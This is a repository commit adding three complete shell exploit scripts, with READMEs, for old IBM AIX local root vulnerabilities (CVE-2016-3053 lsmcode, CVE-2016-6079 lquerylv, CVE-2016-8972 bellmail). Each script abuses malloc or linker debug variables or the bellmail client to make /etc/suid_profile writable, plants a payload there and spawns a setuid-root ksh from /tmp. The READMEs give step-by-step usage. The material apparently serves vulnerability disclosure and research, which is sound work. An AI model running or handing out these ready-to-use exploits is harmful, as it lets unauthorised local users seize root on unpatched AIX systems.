Add old CVEs

CVE-2016-3053/CVE-2016-3053.sh

@@ -0,0 +1,62 @@
+#!/usr/bin/sh
+#
+# AIX lsmcode local root exploit. 
+#
+# Affected: AIX 6.1/7.1/7.2.0.2
+#
+# Blog post URL: 
+#
+# lqueryroot.sh by @hxmonsegur [2016 //RSL]
+
+ROOTSHELL=/tmp/shell-$(od -N4 -tu /dev/random | awk 'NR==1 {print $2} {}')
+
+if [ ! -x "/usr/sbin/lsmcode" ]; then
+    echo "[-] lsmcode isn't executable. Exploit failed."
+    exit 1
+fi
+
+echo "[*] [lsmcode] AIX 6.1/7.1/7.2.0.2 Privilege escalation by @hxmonsegur //RSL"
+echo "[*] Current id: `/usr/bin/id`"
+echo "[*] Exporting variables"
+
+MALLOCOPTIONS=buckets
+MALLOCBUCKETS=number_of_buckets:8,bucket_statistics:/etc/suid_profile
+export MALLOCOPTIONS MALLOCBUCKETS
+
+echo "[*] Setting umask to 000"
+umask 000
+
+echo "[*] Executing vulnerable binary [lsmcode]"
+/usr/sbin/lsmcode -c >/dev/null 2>&1
+
+if [ ! -e "/etc/suid_profile" ]; then
+    echo "[-] /etc/suid_profile does not exist and exploit failed."
+    exit 1
+fi
+
+echo "[*] Cleaning up /etc/suid_profile"
+echo > /etc/suid_profile
+
+echo "[*] Preparing escalation"
+cat << EOF >/etc/suid_profile
+cp /bin/ksh $ROOTSHELL
+/usr/bin/syscall setreuid 0 0
+chown root:system $ROOTSHELL
+chmod 6755 $ROOTSHELL
+rm /etc/suid_profile
+EOF
+
+echo "[*] Cleaning up environment variables"
+unset MALLOCBUCKETS MALLOCOPTIONS
+
+echo "[*] Escalating"
+/usr/bin/ibstat -a >/dev/null 2>&1
+
+if [ ! -e "$ROOTSHELL" ]; then
+    echo "[-] Rootshell does not exist and exploit failed."
+    exit 1
+fi
+
+echo "[*] Executing rootshell"
+$ROOTSHELL
+echo "[*] Make sure to remove $ROOTSHELL"

CVE-2016-3053/README.md

@@ -0,0 +1,24 @@
+# CVE-2016-3053: AIX lsmcode Local Root Exploit
+
+## Information
+**Description:** Allows a locally authenticated user to obtain root level privileges.  
+**Versions Affected:** AIX 6.1/7.1/7.2.0.2  
+**Researcher:** Hector Monsegur (https://twitter.com/hxmonsegur)  
+**Disclosure Link:** https://rhinosecuritylabs.com/research/unix-nostalgia-hunting-zeroday-vulnerabilities-ibm-aix/  
+**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2016-3053  
+
+## Proof-of-Concept Exploit
+### Description
+1. Export MALLOCBUCKETS environment variable, specifying the bucket statistics file as /etc/suid_profile
+2. Set umask to 000, so that /etc/suid_profile would be writable
+3. Execution of lsmcode, in turn creating our arbitrary bucket statistics file
+4. Overwrite /etc/suid_profile, removing statistics from interrupting escalation flow
+5. Adding arbitrary payload to /etc/suid_profile
+6. Execute SUID binary, thus and consequently executing payload inside of /etc/suid_profile
+7. Rootshell is saved into /tmp and ready for use
+
+### Usage/Exploitation
+`./CVE-2016-3053.sh`  
+
+### Screenshot
+![Alt-text that shows up on hover](poc_image.png)

CVE-2016-6079/CVE-2016-6079.sh

@@ -0,0 +1,131 @@
+#!/usr/bin/sh
+#
+# AIX lquerylv 5.3, 6.1, 7.1, 7.2 local root exploit. Tested against latest patchset (7100-04)
+#
+# This exploit takes advantage of known issues with debugging functions
+# within the AIX linker library. We are taking advantage of known 
+# functionality, and focusing on badly coded SUID binaries which do not
+# adhere to proper security checks prior to seteuid/open/writes.
+#
+# The CVEs we will be taking advantage of:
+# - CVE-2009-1786: The malloc subsystem in libc in IBM AIX 5.3 and 6.1 allows 
+#   local users to create or overwrite arbitrary files via a symlink attack on
+#   the log file associated with the MALLOCDEBUG environment variable. 
+#
+# - CVE-2009-2669: A certain debugging component in IBM AIX 5.3 and 6.1 does 
+#   not properly handle the (1) _LIB_INIT_DBG and (2) _LIB_INIT_DBG_FILE 
+#   environment variables, which allows local users to gain privileges by 
+#   leveraging a setuid-root program to create an arbitrary root-owned file 
+#   with world-writable permissions, related to libC.a (aka the XL C++ runtime
+#   library) in AIX 5.3 and libc.a in AIX 6.1. 
+#
+# - CVE-2014-3074: Runtime Linker Allows Privilege Escalation Via Arbitrary 
+#   File Writes In IBM AIX.
+#
+# In each instance of the aforementioned CVEs, IBM merely patched the binaries 
+# which were reported in the original reports as being used for escalation of
+# the vulnerabilities. This allowed for the lquerylv binary to slip by their
+# patches and become an attack vector. 
+#
+# Blog post URL: 
+#
+# lqueryroot.sh by @hxmonsegur [2016 //RSL]
+
+ROOTSHELL=/tmp/shell-$(od -N4 -tu /dev/random | awk 'NR==1 {print $2} {}')
+APP=$0
+
+function usage
+{
+    echo "Usage: $APP [1] | [2] | [3]"
+    echo
+    echo "1 - MALLOCDEBUG file write -> escalation"
+    echo "2 - _LIB_INIT_DBG_FILE file write -> escalation"
+    echo "3 - MALLOCBUCKETS file write -> escalation"
+    echo
+    echo "[lquerylv] AIX 5.3/6.1/7.1/7.2 Privilege escalation by @hxmonsegur //RSL"
+    exit
+}
+
+function CVE20091786
+{
+    echo "[*] Exporting MALLOCDEBUG environment variable"
+    MALLOCTYPE=debug
+    MALLOCDEBUG=report_allocations,output:/etc/suid_profile
+    export MALLOCTYPE MALLOCDEBUG
+}
+
+function CVE20092669
+{
+    echo "[*] Exporting _LIB_INIT_DBG_FILE environment variable"
+    _LIB_INIT_DBG=1
+    _LIB_INIT_DBG_FILE=/etc/suid_profile
+    export _LIB_INIT_DBG _LIB_INIT_DBG_FILE
+}
+
+function CVE20143074
+{
+    echo "[*] Exporting MALLOCBUCKETS environment variable"
+    MALLOCOPTIONS=buckets
+    MALLOCBUCKETS=number_of_buckets:8,bucket_statistics:/etc/suid_profile
+    export MALLOCOPTIONS MALLOCBUCKETS
+}
+
+if [ -z "$1" ]; then
+    usage
+    exit 1
+fi
+
+while [ "$1" != "" ]; do
+    case $1 in
+        1 )    CVE20091786;;
+        2 )    CVE20092669;;
+        3 )    CVE20143074;;
+        * )    usage
+               break;;
+    esac
+    shift
+done
+
+if [ ! -x "/usr/sbin/lquerylv" ]; then
+    echo "[-] lquerylv isn't executable. Tough luck."
+    exit 1
+fi
+
+echo "[*] Setting umask to 000"
+umask 000
+
+echo "[*] Execute our vulnerable binary"
+/usr/sbin/lquerylv >/dev/null 2>&1
+
+if [ ! -e "/etc/suid_profile" ]; then
+    echo "[-] /etc/suid_profile does not exist and exploit failed."
+    exit 1
+fi
+
+echo "[*] Cleaning up /etc/suid_profile"
+echo > /etc/suid_profile
+
+echo "[*] Current id: `/usr/bin/id`"
+
+echo "[*] Adding payload"
+cat << EOF >/etc/suid_profile
+cp /bin/ksh $ROOTSHELL
+/usr/bin/syscall setreuid 0 0
+chown root:system $ROOTSHELL
+chmod 6755 $ROOTSHELL
+rm /etc/suid_profile
+EOF
+
+echo "[*] Unsetting env"
+unset MALLOCBUCKETS MALLOCOPTIONS _LIB_INIT_DBG_FILE _LIB_INIT_DBG MALLOCDEBUG MALLOCTYPE
+
+echo "[*] Executing ibstat for fun and profit"
+/usr/bin/ibstat -a >/dev/null 2>&1
+
+if [ ! -e "$ROOTSHELL" ]; then
+    echo "[-] Rootshell does not exist and exploit failed."
+    exit 1
+fi
+
+echo "[*] Executing rootshell"
+$ROOTSHELL

CVE-2016-6079/README.md

@@ -0,0 +1,18 @@
+# CVE-2016-6079: AIX lquerylv 5.3, 6.1, 7.1, 7.2 Local Root Exploit
+
+## Information
+**Description:** Allows a locally authenticated user to obtain root level privileges.  
+**Versions Affected:** AIX 6.1/7.1/7.2.0.2  
+**Researcher:** Hector Monsegur (https://twitter.com/hxmonsegur)  
+**Disclosure Link:** https://rhinosecuritylabs.com/research/unix-nostalgia-hunting-zeroday-vulnerabilities-ibm-aix/  
+**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2016-6079  
+
+## Proof-of-Concept Exploit
+### Description
+This exploit takes advantage of known issues with debugging functions within the AIX linker library. We are taking advantage of known functionality, and focusing on badly coded SUID binaries which do not adhere to proper security checks prior to seteuid/open/writes.  
+
+### Usage/Exploitation
+`./CVE-2016-6079.sh`
+
+### Screenshot
+![Alt-text that shows up on hover](poc_image.png)

CVE-2016-8972/CVE-2016-8972.sh

@@ -0,0 +1,94 @@
+#!/usr/bin/sh
+#
+# CVE-2016-8972/bellmailroot.sh: IBM AIX Bellmail local root
+#
+# Affected versions:
+# AIX 6.1, 7.1, 7.2
+# VIOS 2.2.x
+#
+#         Fileset                Lower Level  Upper Level KEY
+#        ---------------------------------------------------------
+#        bos.net.tcp.client       6.1.9.0      6.1.9.200   key_w_fs
+#        bos.net.tcp.client       7.1.3.0      7.1.3.47    key_w_fs
+#        bos.net.tcp.client       7.1.4.0      7.1.4.30    key_w_fs
+#        bos.net.tcp.client_core  7.2.0.0      7.2.0.1     key_w_fs
+#        bos.net.tcp.client_core  7.2.1.0      7.2.1.0     key_w_fs
+#
+# Ref: http://aix.software.ibm.com/aix/efixes/security/bellmail_advisory.asc
+# Ref: https://rhinosecuritylabs.com/2016/12/21/unix-nostalgia-aix-bug-hunting-part-2-bellmail-privilege-escalation-cve-2016-8972/
+# @hxmonsegur //RSL - https://www.rhinosecuritylabs.com
+
+ROOTSHELL=/tmp/shell-$(od -N4 -tu /dev/random | awk 'NR==1 {print $2} {}')
+VULNBIN=/usr/bin/bellmail
+SUIDPROFILE=/etc/suid_profile
+
+function ESCALATE
+{
+    echo "[*] Preparing escalation"
+
+    $VULNBIN >/dev/null 2>&1 <<EOD
+s /etc/suid_profile
+EOD
+
+    if [ ! -w $SUIDPROFILE ]; then
+        echo "[-] $SUIDPROFILE is not writable. Exploit failed."
+        exit 1
+    fi
+
+    echo "[*] Clearing out $SUIDPROFILE"
+    echo > /etc/suid_profile
+
+    echo "[*] Injecting payload"
+    cat << EOF >$SUIDPROFILE
+cp /bin/ksh $ROOTSHELL
+/usr/bin/syscall setreuid 0 0
+chown root:system $ROOTSHELL
+chmod 6755 $ROOTSHELL
+rm -f $SUIDPROFILE
+EOF
+
+    echo "[*] Executing SUID to leverage privileges"
+    /usr/bin/ibstat -a >/dev/null 2>&1
+
+    if [ ! -x $ROOTSHELL ]; then
+        echo "[-] Root shell does not exist or is not executable. Exploit failed."
+        exit 1
+    fi
+
+    echo "[*] Escalating to root.."
+    $ROOTSHELL
+    echo "[*] Make sure to remove $ROOTSHELL"
+}
+
+echo "[*] IBM AIX 6.1, 7.1, 7.2 Bellmail Local root @hxmonsegur//RSL"
+
+$VULNBIN -e
+if [ $? -eq 0 ]
+    then
+        ESCALATE
+        echo "[*] Make sure to remove $ROOTSHELL"
+        exit 0
+fi
+
+echo "[*] Sending mail to non-existent user, force a bounce within ~minute"
+/usr/bin/mail nonexistentuser <<EOD
+.
+.
+.
+EOD
+
+echo "[*] Waiting for mail to come in."
+
+while true
+do
+    $VULNBIN -e
+    if [ $? -eq 0 ]
+        then
+            echo "[*] Mail found"
+            ESCALATE
+            break
+        else
+            echo "[-] Mail not received yet. Sleeping."
+            sleep 10
+        fi
+done

CVE-2016-8972/README.md

@@ -0,0 +1,24 @@
+# CVE-2016-8972: IBM AIX Bellmail Local Root Exploit
+
+<!---
+Remember to end each line under the "Information" header with 2 space characters ("  ") to tell Markdown to break the line.
+--->
+## Information
+**Description:** llows a locally authenticated user to obtain root level privileges.  
+**Versions Affected:** AIX 6.1, 7.1, 7.2 VIOS 2.2.x  
+**Researcher:** Hector Monsegur (https://twitter.com/hxmonsegur)  
+**Disclosure Link:** https://rhinosecuritylabs.com/research/unix-nostalgia-aix-bug-hunting-part-2-bellmail-privilege-escalation-cve-2016-8972/  
+**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2016-8972  
+
+## Proof-of-Concept Exploit
+### Description
+1. Send mail to a non-existent user
+2. Within 60 seconds sendmail will bounce the email back
+3. Execute Bellmail binary
+4. While inside of the bellmail client, execute the following: w /etc/suid_profile (or ’s’)  
+
+### Usage/Exploitation
+`./CVE-2016-8972.sh`  
+
+### Screenshot
+![Alt-text that shows up on hover](poc_image.png)